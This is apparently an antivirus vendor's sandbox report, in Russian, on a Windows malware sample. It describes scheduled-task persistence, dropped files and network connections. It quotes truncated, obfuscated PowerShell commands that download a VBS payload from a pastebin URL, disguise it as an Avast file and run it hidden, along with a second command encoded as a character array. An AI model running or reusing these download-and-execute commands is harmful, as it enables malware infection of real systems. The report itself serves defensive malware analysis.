Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\winservice
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $r='KEX'.replace('K','I'); sal D $r;'(&(GCM'+' *W-O*)'+ 'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''https://pastebin.com/raw/cT0iPK2K'',$env:APPDATA+''\''+''AvastUI.vbs'')'|D; start-...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $KJKJhkhkHGUYOUyoi=@(100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,1...
Изменения в файловой системе
Создает следующие файлы
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\dyps348i\config14[1].txt
- %APPDATA%\avastui.vbs
Сетевая активность
Подключается к
- 'pa###bin.com':443
- 'pk#.goog':80
TCP
Запросы HTTP GET
- http://pk#.goog/gsr1/gsr1.crt
Другие
- 'pa###bin.com':443
UDP
- DNS ASK pa###bin.com
- DNS ASK pk#.goog
- DNS ASK gr####opovo.com.br
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\wscript.exe' "%APPDATA%\AvastUI.vbs"
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $r='KEX'.replace('K','I'); sal D $r;'(&(GCM'+' *W-O*)'+ 'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''https://pastebin.com/raw/cT0iPK2K'',$env:APPDATA+''\''+''AvastUI.vbs'')'|D; start-... (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $KJKJhkhkHGUYOUyoi=@(100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,1... (со скрытым окном)
